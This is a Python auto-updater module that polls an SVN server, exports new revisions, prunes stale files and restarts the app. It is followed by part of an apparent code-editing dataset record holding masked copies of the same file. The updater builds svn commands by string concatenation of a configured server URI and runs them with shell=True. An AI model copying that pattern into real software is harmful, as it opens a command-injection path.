        if 'guaSWSource' in GregerDatabase.settings:
            guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
            localLog.debug('Parameter: (guaSWSource) ' + guaSWServerURI)
        else:
            # BUG FIX: str(guaSWSource) referenced an undefined name and
            # raised NameError; log the setting name literally instead.
            self.log.warning('Setting guaSWSource not defined!')
            return
        localLog.debug('Getting software files from server...')
        pCmd = 'svn export --force -r ' + str(swRev)
        pCmd += ' ' + guaSWServerURI
        pCmd += ' ' + targetPath
        localLog.debug(pCmd)
        try:
            # universal_newlines=True => communicate() returns str on Py3.
            p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True,
                universal_newlines=True)
            output, err = p.communicate()
            if err is not None:
                self.log.warning('Error message: ' + str(err))
            else:
                self.log.info('Download successful!')
                for line in output.splitlines():
                    self.log.info(line)
        except Exception as e:
            self.log.error('Oops! Something went wrong - ' + str(e))
            # BUG FIX: parsing used to continue after a failed export and
            # crashed on the undefined 'output'; bail out instead.
            return
        localLog.debug('Reading downloaded revision from "' + output.
            splitlines()[-1] + '"...')
        # Last output line looks like 'Exported revision NNN.'; drop the dot.
        revText = output.splitlines()[-1].split()[-1][:-1]
        localLog.debug('Downloaded Revision: ' + revText)
        self.localRevisionRecord = revText
        localLog.debug('Listing downloaded files...')
        downloadedFiles = []
        for row in output.splitlines()[:-1]:
            # Each row looks like 'A   <path>'; column 1 is the path.
            file = os.path.join(targetRoot, [t.strip() for t in row.split()][1])
            downloadedFiles.append(file)
            localLog.debug('File: ' + file)
        self.log.debug('Getting all files in local directory (after update)...')
        allFiles = []
        for r, d, f in os.walk(targetPath):
            for file in f:
                allFiles.append(os.path.join(r, file))
                localLog.debug('File: ' + allFiles[-1])
            for dir in d:
                allFiles.append(os.path.join(r, dir))
                localLog.debug('Dir: ' + allFiles[-1])
        self.log.info(
            'Identifying old files to remove (<new_files> - <all_files>)...')
        diffFiles = list(set(allFiles) - set(downloadedFiles))
        for file in diffFiles:
            self.log.info('Removing: ' + file)
            try:
                if os.path.isfile(file):
                    os.unlink(file)
                elif os.path.isdir(file):
                    shutil.rmtree(file)
            except Exception as e:
                self.log.warning('Oops! Something went wrong! - ' + str(e))
        self.log.debug('Re-getting all files in local directory...')
        allFiles = []
        for r, d, f in os.walk(targetPath):
            for file in f:
                allFiles.append(os.path.join(r, file))
                self.log.debug('File: ' + os.path.join(r, file))
            for dir in d:
                allFiles.append(os.path.join(r, dir))
                # BUG FIX: previously logged os.path.join(r, file) here.
                self.log.debug('Dir: ' + os.path.join(r, dir))

    def run(self):
        """
        Run Greger Update Agent.

        Waits for the Greger Client Module, then polls for new revisions
        until stopExecution is set, updating and restarting the
        application when a new revision is found.
        """
        localLog = logging.getLogger(self.logPath + '.run')
        self.log.info('Starting Greger Update Agent (GUA)...')
        localLog.debug('Wait for Greger Client Module to start...')
        self.ready.wait()
        # Index all live threads by class name (threading.enumerate).
        allThreads = {}
        for thr in enumerate():
            localLog.debug(thr.name + ' ' + thr.__class__.__name__ + ' active!')
            allThreads.update({thr.__class__.__name__: thr})
            if thr.__class__.__name__ == 'GregerClientModule':
                localLog.debug('Greger Client Module thread found! ' +
                    allThreads['GregerClientModule'].name)
        loopCount = 0
        while not self.stopExecution.is_set():
            loopCount += 1
            localLog.debug('Checking for updates (' + str(loopCount) + ')...')
            localLog.debug('Getting local revision record...')
            localRevision = self.localRevisionRecord
            localLog.debug('Getting latest software info...')
            softwareInfo = self.getSoftwareInfo()
            self.log.info('Revision check done! (' + str(localRevision) + ')')
            # BUG FIX: getSoftwareInfo() returns None when the 'guaSWSource'
            # setting is missing; subscripting None raised TypeError here.
            if softwareInfo is None:
                self.log.warning('Could not retrieve software info!')
            elif int(localRevision) == int(softwareInfo['revision']):
                self.log.info('No new revision found.')
            else:
                self.log.info('New revision found!')
                localLog.debug('Attempting to update software...')
                self.updateSoftware()
                localLog.debug(
                    'Attempting to update server with software info...')
                allThreads['GregerDatabase'].update('about', softwareInfo)
                self.log.info(
                    'Attempting to stop all exection before restarting...')
                allThreads['GregerClientModule'].stopAll(GUA=True)
                self.log.info('Attemption to restart application...')
                restart_program()
            if 'guaCheckUpdateDelay' in GregerDatabase.settings:
                delayTime = GregerDatabase.settings['guaCheckUpdateDelay'][
                    'value']
            else:
                delayTime = 10
                self.log.warning('Settings not defined! (using default=10)')
            self.log.info('Waiting ' + str(delayTime) + 's...')
            self.stopExecution.wait(delayTime)
        self.log.info('Greger Update Agent (GUA) execution stopped!')
<|reserved_special_token_1|>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Greger Update Agent (GUA) module for the Greger Client Module
"""
__author__ = "Eric Sandbling"
__license__ = 'MIT'
__status__ = 'Development'
# System modules
import os, sys
import shutil
import logging
import subprocess
from threading import Event
from threading import Thread
from threading import enumerate
# Local Modules
from common import getLocalConfig
from common import restart_program
from gdb import GregerDatabase
# from gcm import GregerClientModule
class GregerUpdateAgent(Thread):
    """
    Main class which holds the main sequence of the application.

    Polls an SVN server for new software revisions, downloads them,
    prunes stale local files and restarts the application.
    """

    def __init__(self, ready=None):
        '''
        Initialize the main class.

        :param ready: threading.Event set by the Greger Client Module
                      once start-up is complete; run() waits on it.
        '''
        Thread.__init__(self)
        self.ready = ready

        # Setup logging
        self.logPath = "root.GUA"
        self.log = logging.getLogger(self.logPath)
        localLog = logging.getLogger(self.logPath + ".__init__")
        localLog.debug("Initiating Greger Update Agent (GUA)...")

        # Stop execution handler
        self.stopExecution = Event()

        # Get local path
        self._location = os.path.abspath(__file__)
        self._location = self._location[:-15]   # Trim gcm/__main__.py from path to get at location of application
        localLog.debug("Local path: " + self._location)

        # Get Local Configuration Parameters
        localLog.debug("Getting configuration parameters from file...")
        config = getLocalConfig()

        # Locally relevant parameters
        self.localRevisionRecordPath = config.get("greger_update_agent", "local_revision_path")
        localLog.debug("Parameter: (localRevisionRecordPath) " + self.localRevisionRecordPath)

        self.log.info("Greger Update Agent (GUA) successfully initiated!")

    @property
    def localRevisionRecord(self):
        '''
        Get local revision record (.gcm).

        Falls back to 0 (creating the record file) if it cannot be read.
        '''
        # Logging
        localLog = logging.getLogger(self.logPath + ".localRevisionRecord")
        localLog.debug("Getting local revision record...")

        # Local parameters
        revisionRecordPath = self.localRevisionRecordPath

        localLog.debug("Attemption to get record from file...")
        try:
            with open(revisionRecordPath, "r") as f:
                localRecord = f.read()
            localLog.debug("Local revision record: " + str(localRecord))
        except Exception as e:
            self.log.warning("Failed to open file! - " + str(e))
            # Initialize the record to 0, then re-read it via the getter.
            self.localRevisionRecord = 0
            localRecord = self.localRevisionRecord
        return localRecord

    @localRevisionRecord.setter
    def localRevisionRecord(self, newRevision):
        '''
        Set local revision record (.gcm).
        '''
        # Logging
        localLog = logging.getLogger(self.logPath + ".localRevisionRecord")
        localLog.debug("Setting local revision record (.gcm) to " + str(newRevision) + "...")

        # Local parameters
        revisionRecordPath = self.localRevisionRecordPath

        localLog.debug("Attemption to write \"" + str(newRevision) + "\" to file...")
        with open(revisionRecordPath, "w") as f:
            f.write(str(newRevision))
        self.log.info("Local revision record set: " + str(newRevision))

    def getSoftwareInfo(self, rev='HEAD'):
        '''
        Retrieve information about a revision available on server.

        :param rev: revision to query (default 'HEAD').
        :return: dict with revision number, SHA, author, date and comment,
                 or None if the server URI setting is missing.
        '''
        # Logging
        localLog = logging.getLogger(self.logPath + ".getSoftwareInfo")
        localLog.debug("Attempting to retrieve software revision info...")

        # Locally relevant parameters
        if 'guaSWSource' in GregerDatabase.settings:
            guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
        else:
            # BUG FIX: str(guaSWSource) referenced an undefined name and
            # raised NameError; log the setting name literally instead.
            self.log.warning("Setting guaSWSource not defined!")
            return
        moduleReturn = {
            'revision': "",
            'revision_SHA': "",
            'revision_author': "",
            'revision_date': "",
            'revision_comment': ""
        }

        # Get server revision info
        localLog.debug("Attempting to retrieve info from server... " + guaSWServerURI)
        pCmd = "svn proplist -v -R --revprop -r " + rev
        pCmd += " " + guaSWServerURI
        localLog.debug(pCmd)
        try:
            # universal_newlines=True makes communicate() return str on
            # Python 3 (the parsing below compares against str literals).
            p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True,
                                 universal_newlines=True)
            (output, err) = p.communicate()

            # Create list of output and remove extra white spaces
            outputList = output.splitlines()[1:]
            outputList = [elem.strip() for elem in outputList]

            # Get revision from output
            revStr = output.splitlines()[0]
            revStr = revStr.split()[-1]
            moduleReturn['revision'] = revStr[:-1]
            localLog.debug("Revision: " + revStr[:-1])

            # Get SHA
            shaStr = outputList[outputList.index('git-commit') + 1]
            moduleReturn['revision_SHA'] = shaStr
            localLog.debug("Revision SHA: " + shaStr)

            # Get revision author
            authorStr = outputList[outputList.index('svn:author') + 1]
            moduleReturn['revision_author'] = authorStr
            localLog.debug("Revision author: " + authorStr)

            # Get revision date
            dateStr = outputList[outputList.index('svn:date') + 1]
            moduleReturn['revision_date'] = dateStr
            localLog.debug("Revision date: " + dateStr)

            # Get revision comment
            commentStr = outputList[outputList.index('svn:log') + 1].strip()
            moduleReturn['revision_comment'] = commentStr
            localLog.debug("Revision Comment: " + commentStr)

            if err is not None:
                localLog.debug("Error message: " + str(err))
        except Exception as e:
            self.log.error("Oops! Something went wrong - " + str(e))

        return moduleReturn

    def updateSoftware(self, swRev='HEAD'):
        '''
        Get and updating software from server.

        Downloads revision *swRev* into <app root>/gcm via 'svn export'
        and removes local files not part of the new release.
        '''
        # Logging
        localLog = logging.getLogger(self.logPath + ".updateSoftware")
        localLog.debug("Getting software revision " + str(swRev) + " from server and updating local client...")

        # Locally relevant parameters
        localLog.debug("Constructing target path for new software...")
        targetRoot = self._location
        targetDir = "gcm"
        targetPath = os.path.join(targetRoot, targetDir)
        localLog.debug("Target path: " + targetPath)

        localLog.debug("Retrieving relevant parameters from server...")
        if 'guaSWSource' in GregerDatabase.settings:
            guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
            localLog.debug("Parameter: (guaSWSource) " + guaSWServerURI)
        else:
            # BUG FIX: str(guaSWSource) referenced an undefined name and
            # raised NameError; log the setting name literally instead.
            self.log.warning("Setting guaSWSource not defined!")
            return

        # Get software files from server
        localLog.debug("Getting software files from server...")

        # Compile download command
        pCmd = "svn export --force -r " + str(swRev)
        pCmd += " " + guaSWServerURI
        pCmd += " " + targetPath
        localLog.debug(pCmd)

        # Execute command
        try:
            # universal_newlines=True => communicate() returns str on Py3.
            p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True,
                                 universal_newlines=True)
            (output, err) = p.communicate()
            if err is not None:
                self.log.warning("Error message: " + str(err))
            else:
                self.log.info("Download successful!")
                # Print output
                for line in output.splitlines():
                    self.log.info(line)
        except Exception as e:
            self.log.error("Oops! Something went wrong - " + str(e))
            # BUG FIX: parsing used to continue after a failed export and
            # crashed on the undefined 'output'; bail out instead.
            return

        # Read revision text; the last line looks like
        # 'Exported revision NNN.' - strip the trailing dot.
        localLog.debug("Reading downloaded revision from \"" + output.splitlines()[-1] + "\"...")
        revText = output.splitlines()[-1].split()[-1][:-1]
        localLog.debug("Downloaded Revision: " + revText)

        # Update local revision record
        self.localRevisionRecord = revText

        # Get downloaded files text; each row looks like 'A   <path>'.
        localLog.debug("Listing downloaded files...")
        downloadedFiles = []
        for row in output.splitlines()[:-1]:
            file = os.path.join(targetRoot, [t.strip() for t in row.split()][1])
            downloadedFiles.append(file)
            localLog.debug("File: " + file)

        # List files in directory
        self.log.debug("Getting all files in local directory (after update)...")
        allFiles = []
        # r=root, d=directories, f = files
        for r, d, f in os.walk(targetPath):
            for file in f:
                allFiles.append(os.path.join(r, file))
                localLog.debug("File: " + allFiles[-1])
            for dir in d:
                allFiles.append(os.path.join(r, dir))
                localLog.debug("Dir: " + allFiles[-1])

        self.log.info("Identifying old files to remove (<new_files> - <all_files>)...")
        diffFiles = list(set(allFiles) - set(downloadedFiles))
        for file in diffFiles:
            self.log.info("Removing: " + file)
            try:
                if os.path.isfile(file):
                    os.unlink(file)
                elif os.path.isdir(file):
                    shutil.rmtree(file)
            except Exception as e:
                self.log.warning("Oops! Something went wrong! - " + str(e))

        # List files in directory
        self.log.debug("Re-getting all files in local directory...")
        allFiles = []
        # r=root, d=directories, f = files
        for r, d, f in os.walk(targetPath):
            for file in f:
                allFiles.append(os.path.join(r, file))
                self.log.debug("File: " + os.path.join(r, file))
            for dir in d:
                allFiles.append(os.path.join(r, dir))
                # BUG FIX: previously logged os.path.join(r, file) here.
                self.log.debug("Dir: " + os.path.join(r, dir))

    def run(self):
        '''
        Run Greger Update Agent.

        Waits for the Greger Client Module, then polls for new revisions
        until stopExecution is set, updating and restarting the
        application when a new revision is found.
        '''
        # Logging
        localLog = logging.getLogger(self.logPath + ".run")
        self.log.info("Starting Greger Update Agent (GUA)...")

        # Wait for Greger Client Module to start...
        localLog.debug("Wait for Greger Client Module to start...")
        self.ready.wait()

        # Get all active threads, indexed by class name (threading.enumerate).
        allThreads = {}
        for thr in enumerate():
            localLog.debug(thr.name + " " + thr.__class__.__name__ + " active!")
            allThreads.update({thr.__class__.__name__: thr})
            if thr.__class__.__name__ == "GregerClientModule":
                localLog.debug("Greger Client Module thread found! " +
                               allThreads['GregerClientModule'].name)

        # Start checking for updates
        loopCount = 0
        while not self.stopExecution.is_set():
            loopCount += 1
            localLog.debug("Checking for updates (" + str(loopCount) + ")...")

            # Get local revision record
            localLog.debug("Getting local revision record...")
            localRevision = self.localRevisionRecord

            # Get server revision...
            localLog.debug("Getting latest software info...")
            softwareInfo = self.getSoftwareInfo()

            self.log.info("Revision check done! (" + str(localRevision) + ")")
            # BUG FIX: getSoftwareInfo() returns None when the 'guaSWSource'
            # setting is missing; subscripting None raised TypeError here.
            if softwareInfo is None:
                self.log.warning("Could not retrieve software info!")
            elif int(localRevision) == int(softwareInfo['revision']):
                self.log.info("No new revision found.")
            else:
                self.log.info("New revision found!")

                # Do update!!
                localLog.debug("Attempting to update software...")
                self.updateSoftware()

                # Update server with updated software
                localLog.debug("Attempting to update server with software info...")
                allThreads['GregerDatabase'].update('about', softwareInfo)

                # Tell GCM to stop all treads (except GUA)...
                self.log.info("Attempting to stop all exection before restarting...")
                allThreads['GregerClientModule'].stopAll(GUA=True)

                # Restart Application
                self.log.info("Attemption to restart application...")
                restart_program()

            if 'guaCheckUpdateDelay' in GregerDatabase.settings:
                delayTime = GregerDatabase.settings['guaCheckUpdateDelay']['value']
            else:
                delayTime = 10
                self.log.warning("Settings not defined! (using default=10)")

            # Wait update delay
            self.log.info("Waiting " + str(delayTime) + "s...")
            self.stopExecution.wait(delayTime)

        self.log.info("Greger Update Agent (GUA) execution stopped!")
|
flexible
|
{
"blob_id": "a9b2a4d4924dcdd6e146ea346e71bf42c0259846",
"index": 593,
"step-1": "<mask token>\n\n\nclass GregerUpdateAgent(Thread):\n <mask token>\n <mask token>\n\n @property\n def localRevisionRecord(self):\n \"\"\"\n Get local revision record (.gcm)\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.localRevisionRecord')\n localLog.debug('Getting local revision record...')\n revisionRecordPath = self.localRevisionRecordPath\n localLog.debug('Attemption to get record from file...')\n try:\n with open(revisionRecordPath, 'r') as f:\n localRecord = f.read()\n localLog.debug('Local revision record: ' + str(localRecord))\n except Exception as e:\n self.log.warning('Failed to open file! - ' + str(e))\n self.localRevisionRecord = 0\n localRecord = self.localRevisionRecord\n return localRecord\n <mask token>\n\n def getSoftwareInfo(self, rev='HEAD'):\n \"\"\"\n Retrieve information about a revision available on server.\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.getSoftwareInfo')\n localLog.debug('Attempting to retrieve software revision info...')\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n else:\n self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')\n return\n moduleReturn = {'revision': '', 'revision_SHA': '',\n 'revision_author': '', 'revision_date': '', 'revision_comment': ''}\n localLog.debug('Attempting to retrieve info from server... 
' +\n guaSWServerURI)\n pCmd = 'svn proplist -v -R --revprop -r ' + rev\n pCmd += ' ' + guaSWServerURI\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n outputList = output.splitlines()[1:]\n outputList = [elem.strip() for elem in outputList]\n revStr = output.splitlines()[0]\n revStr = revStr.split()[-1]\n moduleReturn['revision'] = revStr[:-1]\n localLog.debug('Revision: ' + revStr[:-1])\n shaStr = outputList[outputList.index('git-commit') + 1]\n moduleReturn['revision_SHA'] = shaStr\n localLog.debug('Revision SHA: ' + shaStr)\n authorStr = outputList[outputList.index('svn:author') + 1]\n moduleReturn['revision_author'] = authorStr\n localLog.debug('Revision author: ' + authorStr)\n dateStr = outputList[outputList.index('svn:date') + 1]\n moduleReturn['revision_date'] = dateStr\n localLog.debug('Revision date: ' + dateStr)\n commentStr = outputList[outputList.index('svn:log') + 1].strip()\n moduleReturn['revision_comment'] = commentStr\n localLog.debug('Revision Comment: ' + commentStr)\n if err is not None:\n localLog.debug('Error message: ' + str(err))\n except Exception as e:\n self.log.error('Oops! 
Something went wrong - ' + str(e))\n return moduleReturn\n\n def updateSoftware(self, swRev='HEAD'):\n \"\"\"\n Get and updating software from server\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.updateSoftware')\n localLog.debug('Getting software revision ' + str(swRev) +\n ' from server and updating local client...')\n localLog.debug('Constructing target path for new software...')\n targetRoot = self._location\n targetDir = 'gcm'\n targetPath = os.path.join(targetRoot, targetDir)\n localLog.debug('Target path: ' + targetPath)\n localLog.debug('Retrieving relevant parameters from server...')\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n localLog.debug('Parameter: (guaSWSource) ' + guaSWServerURI)\n else:\n self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')\n return\n localLog.debug('Getting software files from server...')\n pCmd = 'svn export --force -r ' + str(swRev)\n pCmd += ' ' + guaSWServerURI\n pCmd += ' ' + targetPath\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n if err is not None:\n self.log.warning('Error message: ' + str(err))\n else:\n self.log.info('Download successful!')\n for line in output.splitlines():\n self.log.info(line)\n except Exception as e:\n self.log.error('Oops! 
Something went wrong - ' + str(e))\n localLog.debug('Reading downloaded revision from \"' + output.\n splitlines()[-1] + '\"...')\n revText = output.splitlines()[-1].split()[-1][:-1]\n localLog.debug('Downloaded Revision: ' + revText)\n self.localRevisionRecord = revText\n localLog.debug('Listing downloaded files...')\n downloadedFiles = []\n for row in output.splitlines()[:-1]:\n file = os.path.join(targetRoot, [t.strip() for t in row.split()][1]\n )\n downloadedFiles.append(file)\n localLog.debug('File: ' + file)\n self.log.debug('Getting all files in local directory (after update)...'\n )\n allFiles = []\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n localLog.debug('File: ' + allFiles[-1])\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n localLog.debug('Dir: ' + allFiles[-1])\n self.log.info(\n 'Identifying old files to remove (<new_files> - <all_files>)...')\n diffFiles = list(set(allFiles) - set(downloadedFiles))\n for file in diffFiles:\n self.log.info('Removing: ' + file)\n try:\n if os.path.isfile(file):\n os.unlink(file)\n elif os.path.isdir(file):\n shutil.rmtree(file)\n except Exception as e:\n self.log.warning('Oops! Something went wrong! 
- ' + str(e))\n self.log.debug('Re-getting all files in local directory...')\n allFiles = []\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n self.log.debug('File: ' + os.path.join(r, file))\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n self.log.debug('Dir: ' + os.path.join(r, file))\n\n def run(self):\n \"\"\"\n Run Greger Update Agent.\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.run')\n self.log.info('Starting Greger Update Agent (GUA)...')\n localLog.debug('Wait for Greger Client Module to start...')\n self.ready.wait()\n allThreads = {}\n for thr in enumerate():\n localLog.debug(thr.name + ' ' + thr.__class__.__name__ + ' active!'\n )\n allThreads.update({thr.__class__.__name__: thr})\n if thr.__class__.__name__ == 'GregerClientModule':\n localLog.debug('Greger Client Module thread found! ' +\n allThreads['GregerClientModule'].name)\n loopCount = 0\n while not self.stopExecution.is_set():\n loopCount += 1\n localLog.debug('Checking for updates (' + str(loopCount) + ')...')\n localLog.debug('Getting local revision record...')\n localRevision = self.localRevisionRecord\n localLog.debug('Getting latest software info...')\n softwareInfo = self.getSoftwareInfo()\n self.log.info('Revision check done! 
(' + str(localRevision) + ')')\n if int(localRevision) == int(softwareInfo['revision']):\n self.log.info('No new revision found.')\n else:\n self.log.info('New revision found!')\n localLog.debug('Attempting to update software...')\n self.updateSoftware()\n localLog.debug(\n 'Attempting to update server with software info...')\n allThreads['GregerDatabase'].update('about', softwareInfo)\n self.log.info(\n 'Attempting to stop all exection before restarting...')\n allThreads['GregerClientModule'].stopAll(GUA=True)\n self.log.info('Attemption to restart application...')\n restart_program()\n if 'guaCheckUpdateDelay' in GregerDatabase.settings:\n delayTime = GregerDatabase.settings['guaCheckUpdateDelay'][\n 'value']\n else:\n delayTime = 10\n self.log.warning('Settings not defined! (using default=10)')\n self.log.info('Waiting ' + str(delayTime) + 's...')\n self.stopExecution.wait(delayTime)\n self.log.info('Greger Update Agent (GUA) execution stopped!')\n",
"step-2": "<mask token>\n\n\nclass GregerUpdateAgent(Thread):\n <mask token>\n <mask token>\n\n @property\n def localRevisionRecord(self):\n \"\"\"\n Get local revision record (.gcm)\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.localRevisionRecord')\n localLog.debug('Getting local revision record...')\n revisionRecordPath = self.localRevisionRecordPath\n localLog.debug('Attemption to get record from file...')\n try:\n with open(revisionRecordPath, 'r') as f:\n localRecord = f.read()\n localLog.debug('Local revision record: ' + str(localRecord))\n except Exception as e:\n self.log.warning('Failed to open file! - ' + str(e))\n self.localRevisionRecord = 0\n localRecord = self.localRevisionRecord\n return localRecord\n\n @localRevisionRecord.setter\n def localRevisionRecord(self, newRevision):\n \"\"\"\n Set local revision record (.gcm)\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.localRevisionRecord')\n localLog.debug('Setting local revision record (.gcm) to ' + str(\n newRevision) + '...')\n revisionRecordPath = self.localRevisionRecordPath\n localLog.debug('Attemption to write \"' + str(newRevision) +\n '\" to file...')\n with open(revisionRecordPath, 'w') as f:\n f.write(str(newRevision))\n self.log.info('Local revision record set: ' + str(newRevision))\n\n def getSoftwareInfo(self, rev='HEAD'):\n \"\"\"\n Retrieve information about a revision available on server.\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.getSoftwareInfo')\n localLog.debug('Attempting to retrieve software revision info...')\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n else:\n self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')\n return\n moduleReturn = {'revision': '', 'revision_SHA': '',\n 'revision_author': '', 'revision_date': '', 'revision_comment': ''}\n localLog.debug('Attempting to retrieve info from server... 
' +\n guaSWServerURI)\n pCmd = 'svn proplist -v -R --revprop -r ' + rev\n pCmd += ' ' + guaSWServerURI\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n outputList = output.splitlines()[1:]\n outputList = [elem.strip() for elem in outputList]\n revStr = output.splitlines()[0]\n revStr = revStr.split()[-1]\n moduleReturn['revision'] = revStr[:-1]\n localLog.debug('Revision: ' + revStr[:-1])\n shaStr = outputList[outputList.index('git-commit') + 1]\n moduleReturn['revision_SHA'] = shaStr\n localLog.debug('Revision SHA: ' + shaStr)\n authorStr = outputList[outputList.index('svn:author') + 1]\n moduleReturn['revision_author'] = authorStr\n localLog.debug('Revision author: ' + authorStr)\n dateStr = outputList[outputList.index('svn:date') + 1]\n moduleReturn['revision_date'] = dateStr\n localLog.debug('Revision date: ' + dateStr)\n commentStr = outputList[outputList.index('svn:log') + 1].strip()\n moduleReturn['revision_comment'] = commentStr\n localLog.debug('Revision Comment: ' + commentStr)\n if err is not None:\n localLog.debug('Error message: ' + str(err))\n except Exception as e:\n self.log.error('Oops! 
Something went wrong - ' + str(e))\n return moduleReturn\n\n def updateSoftware(self, swRev='HEAD'):\n \"\"\"\n Get and updating software from server\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.updateSoftware')\n localLog.debug('Getting software revision ' + str(swRev) +\n ' from server and updating local client...')\n localLog.debug('Constructing target path for new software...')\n targetRoot = self._location\n targetDir = 'gcm'\n targetPath = os.path.join(targetRoot, targetDir)\n localLog.debug('Target path: ' + targetPath)\n localLog.debug('Retrieving relevant parameters from server...')\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n localLog.debug('Parameter: (guaSWSource) ' + guaSWServerURI)\n else:\n self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')\n return\n localLog.debug('Getting software files from server...')\n pCmd = 'svn export --force -r ' + str(swRev)\n pCmd += ' ' + guaSWServerURI\n pCmd += ' ' + targetPath\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n if err is not None:\n self.log.warning('Error message: ' + str(err))\n else:\n self.log.info('Download successful!')\n for line in output.splitlines():\n self.log.info(line)\n except Exception as e:\n self.log.error('Oops! 
Something went wrong - ' + str(e))\n localLog.debug('Reading downloaded revision from \"' + output.\n splitlines()[-1] + '\"...')\n revText = output.splitlines()[-1].split()[-1][:-1]\n localLog.debug('Downloaded Revision: ' + revText)\n self.localRevisionRecord = revText\n localLog.debug('Listing downloaded files...')\n downloadedFiles = []\n for row in output.splitlines()[:-1]:\n file = os.path.join(targetRoot, [t.strip() for t in row.split()][1]\n )\n downloadedFiles.append(file)\n localLog.debug('File: ' + file)\n self.log.debug('Getting all files in local directory (after update)...'\n )\n allFiles = []\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n localLog.debug('File: ' + allFiles[-1])\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n localLog.debug('Dir: ' + allFiles[-1])\n self.log.info(\n 'Identifying old files to remove (<new_files> - <all_files>)...')\n diffFiles = list(set(allFiles) - set(downloadedFiles))\n for file in diffFiles:\n self.log.info('Removing: ' + file)\n try:\n if os.path.isfile(file):\n os.unlink(file)\n elif os.path.isdir(file):\n shutil.rmtree(file)\n except Exception as e:\n self.log.warning('Oops! Something went wrong! 
- ' + str(e))\n self.log.debug('Re-getting all files in local directory...')\n allFiles = []\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n self.log.debug('File: ' + os.path.join(r, file))\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n self.log.debug('Dir: ' + os.path.join(r, file))\n\n def run(self):\n \"\"\"\n Run Greger Update Agent.\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.run')\n self.log.info('Starting Greger Update Agent (GUA)...')\n localLog.debug('Wait for Greger Client Module to start...')\n self.ready.wait()\n allThreads = {}\n for thr in enumerate():\n localLog.debug(thr.name + ' ' + thr.__class__.__name__ + ' active!'\n )\n allThreads.update({thr.__class__.__name__: thr})\n if thr.__class__.__name__ == 'GregerClientModule':\n localLog.debug('Greger Client Module thread found! ' +\n allThreads['GregerClientModule'].name)\n loopCount = 0\n while not self.stopExecution.is_set():\n loopCount += 1\n localLog.debug('Checking for updates (' + str(loopCount) + ')...')\n localLog.debug('Getting local revision record...')\n localRevision = self.localRevisionRecord\n localLog.debug('Getting latest software info...')\n softwareInfo = self.getSoftwareInfo()\n self.log.info('Revision check done! 
(' + str(localRevision) + ')')\n if int(localRevision) == int(softwareInfo['revision']):\n self.log.info('No new revision found.')\n else:\n self.log.info('New revision found!')\n localLog.debug('Attempting to update software...')\n self.updateSoftware()\n localLog.debug(\n 'Attempting to update server with software info...')\n allThreads['GregerDatabase'].update('about', softwareInfo)\n self.log.info(\n 'Attempting to stop all exection before restarting...')\n allThreads['GregerClientModule'].stopAll(GUA=True)\n self.log.info('Attemption to restart application...')\n restart_program()\n if 'guaCheckUpdateDelay' in GregerDatabase.settings:\n delayTime = GregerDatabase.settings['guaCheckUpdateDelay'][\n 'value']\n else:\n delayTime = 10\n self.log.warning('Settings not defined! (using default=10)')\n self.log.info('Waiting ' + str(delayTime) + 's...')\n self.stopExecution.wait(delayTime)\n self.log.info('Greger Update Agent (GUA) execution stopped!')\n",
